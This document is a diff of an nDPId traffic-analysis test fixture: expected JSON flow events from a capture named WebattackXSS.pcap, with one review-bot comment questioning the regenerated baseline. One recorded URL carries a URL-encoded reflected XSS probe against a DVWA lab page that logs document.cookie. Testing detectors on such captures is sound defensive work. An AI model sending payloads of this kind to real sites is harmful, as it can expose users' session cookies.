00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499346976604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UoBAAD4Gc1isEAABwKgKMsxKAFAevqLfCp5sYoAQAOVB3wAAAQEICgE48KED4sIY"} 
-00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976677,"flow_last_seen":1499346976677,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976677,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1499346976677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8I8VAAD4GogusEAABwKgKMsxMAFCAL9N2AAAAAKACchBM1QAAAgQFtAQCCAoBOPCzAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1499346976677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEzfj2P1gC\/Td6AScSBEIgAAAgQFtAQCCAoD4sIqATjwswEDAwc="} 
@@ -51,8 +51,8 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzGAmGFC+ciJO0aAScSCizgAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z5JAAD4GXkasEAABwKgKMsxeAFDFSpaWtwyVpoAQAOXRDgAAAQEICgE48QQD4sJ7"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0v9VAAD4GBgOsEAABwKgKMsxgAFByIk7RJhhQv4AQAOVB1gAAAQEICgE48QQD4sJ7"} 
-00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346983175,"flow_last_seen":1499346983175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346983175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1499346983175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ikRAAD4GO4ysEAABwKgKMsyiAFBY531IAAAAAKACchDDnAAAAgQFtAQCCAoBOPcMAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1499346983175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzKJurEWjWOd9SaAScSBDxgAAAgQFtAQCCAoD4siDATj3DAEDAwc="} 
@@ -177,7 +177,7 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1499347035750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OG5AAD4GjWKsEAABwKgKMs7KAFDI6hIKAAAAAKACchCJVwAAAgQFtAQCCAoBOSpkAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1499347035750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzsrSHYegyOoSC6AScSAwugAAAgQFtAQCCAoD4vvbATkqZAEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1499347035751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347035751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OG9AAD4GjWmsEAABwKgKMs7KAFDI6hIL0h2HoYAQAOXPwQAAAQEICgE5KmQD4vvb"} 
-01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347038276,"flow_last_seen":1499347038276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347038276,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1499347038276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83pNAAD4G5zysEAABwKgKMs7kAFBDY\/JIAAAAAKACchAsDwAAAgQFtAQCCAoBOSzbAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1499347038276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzuS5pPWWQ2PySaAScSB7fQAAAgQFtAQCCAoD4v5SATks2wEDAwc="} 
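Review bot: The updated `detected` event for flow 41 still lists only flow risk `12` (HTTP Numeric IP Address, severity Low), although the `url` it records carries a script-tag query parameter. As regenerated, the fixture pins a result in which the request that gives this capture its name raises no injection-related risk. Whether that risk is set only after this event is emitted, or is absent because of how the test binary is built, cannot be told from the fixture and should be confirmed before accepting the new baseline. The SQL-injection `detected` event for flow 9 in WebattackSQLinj.pcap.out shows the same pattern.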
@@ -246,7 +246,7 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1499347066560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zkNAAD4G94ysEAABwKgKMtAMAFBP5YY5AAAAAKACchBu1QAAAgQFtAQCCAoBOUh6AAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1499347066560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Ax\/i5rPT+WGOqAScSA3hQAAAgQFtAQCCAoD4xnxATlIegEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1499347066560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zkRAAD4G95OsEAABwKgKMtAMAFBP5YY6f4ua0IAQAOXWiwAAAQEICgE5SHsD4xnx"} 
-00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -305,7 +305,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1499347088552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA892FAAD4Gzm6sEAABwKgKMtDyAFAECKqUAAAAAKACchB\/9gAAAgQFtAQCCAoBOV31AAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1499347088552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0PJdbGlkBAiqlaAScSCGtgAAAgQFtAQCCAoD4y9rATld9QEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1499347088553,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347088553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA092JAAD4GznWsEAABwKgKMtDyAFAECKqVXWxpZYAQAOUlvgAAAQEICgE5XfUD4y9r"} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 